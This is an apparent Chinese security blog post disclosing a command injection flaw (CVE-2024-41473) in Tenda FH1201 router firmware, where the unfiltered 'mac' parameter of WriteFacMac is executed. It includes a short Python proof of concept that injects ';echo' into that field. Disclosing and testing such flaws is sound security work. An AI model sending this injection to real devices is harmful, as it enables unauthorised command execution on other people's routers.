Warning: Undefined array key "HTTP_ACCEPT_LANGUAGE" in /www/wwwroot/blog.guapiwo.top/usr/themes/joe/public/tencent_protect.php on line 40

Deprecated: strpos(): Passing null to parameter #1 ($haystack) of type string is deprecated in /www/wwwroot/blog.guapiwo.top/usr/themes/joe/public/tencent_protect.php on line 40
Tenda-FH1201存在命令注入漏洞(CVE-2024-41473) - 瓜皮博客_d0glun
Tenda-FH1201存在命令注入漏洞(CVE-2024-41473)
登录 / 注册
侧边栏壁纸
博主昵称
d0glun

  • 累计撰写 25 篇文章
  • 累计收到 2 条评论
Tenda-FH1201存在命令注入漏洞(CVE-2024-41473)
瓜皮博客_d0glun
漏洞POC

Tenda-FH1201存在命令注入漏洞(CVE-2024-41473)

d0glun
d0glun
2025-05-20 / 0 评论 / 2 阅读 / 正在检测是否收录...

Tenda-FH1201存在命令注入漏洞(CVE-2024-41473)
漏洞POC
Tenda FH1201 v1.2.0.14 存在命令注入漏洞,位于 WriteFacMac 函数中。mac 参数未经任何过滤就被复制到 var 中,然后执行,因此攻击者可利用此漏洞执行任意命令
固件下载网址:https://www.tendacn.com/download/detail-3322.html

1

POC

import requests

ip = '192.168.74.145'

url = "http://" + ip + "/goform/WriteFacMac"
payload = ";echo 'hacker!'"

data = {"mac": payload}
response = requests.post(url, data=data)
print(response.text)
0
暂无标签
收藏本站,优质文章不错过
blog.guapiwo.top
版权属于: d0glun
本文链接: https://blog.guapiwo.top/index.php/archives/16/
作品采用: 署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 》许可协议授权

评论 (0)

取消